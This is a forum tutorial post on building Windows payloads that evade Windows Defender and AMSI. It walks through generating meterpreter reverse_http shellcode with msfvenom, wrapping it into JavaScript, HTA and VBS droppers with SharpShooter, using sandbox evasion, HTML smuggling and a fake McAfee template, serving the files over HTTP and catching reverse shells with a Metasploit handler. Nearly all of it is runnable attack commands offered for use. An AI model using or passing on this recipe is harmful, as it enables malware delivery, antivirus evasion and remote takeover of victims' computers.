Client-Side Exploitation Evade AntiVirus

evade-antivirus
exploitation
#1

Hello Guys! Today I am going to show you how to:

  • Create a Payload that isn’t detected by Windows Defender, even with real-time protection, advanced threat protection, and AMSI
  • Sharpshooter + Metasploit*

Generating your shellcode

./msfvenom -a x64 -p windows/x64/meterpreter/reverse_http LHOST=192.168.1.2 LPORT=1337 EnableStageEncoding=True PrependMigrate=True -f raw -o payload.txt

Generating your payload

Stageless JavaScript

SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

Create a stageless JavaScript payload targeting version 4 of the .NET framework. This example will create a payload named foo.js in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by keying execution to the CONTOSO domain, and checking for known sandbox/VM artifacts.

Stageless HTA

SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

Create a stageless HTA payload targeting version 2/3 of the .NET framework. This example will create a payload named foo.hta in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by checking for known virtual MAC addresses. A HTML smuggling payload will also be generated named foo.html in the output directory. This payload will use the example McAfee virus scan template.

Staged VBS

SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

SharpShooter v1.0 vs Defender AMSI Bypass from Dominic Chell on Vimeo.

Serving up our Malicious files…

python -m SimpleHTTPServer

This will create a basic python web server on port 8000, inside the directory where our payload is.

Now, in another window, start your Metasploit handler.

sudo -E ./msfconsole
use exploit/multi/handler
set LHOST 192.168.1.2
set LPORT 1337
set PAYLOAD windows/x64/meterpreter/reverse_http
set ExitOnSession false
exploit -j

Now you should have a reverse_http handler started. Simply ensure that ports 1337 and ports 443 are open. And now navigate to http://192.168.1.2:8000/foo.html . You should be able to open the files, and should receive a shell!

https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/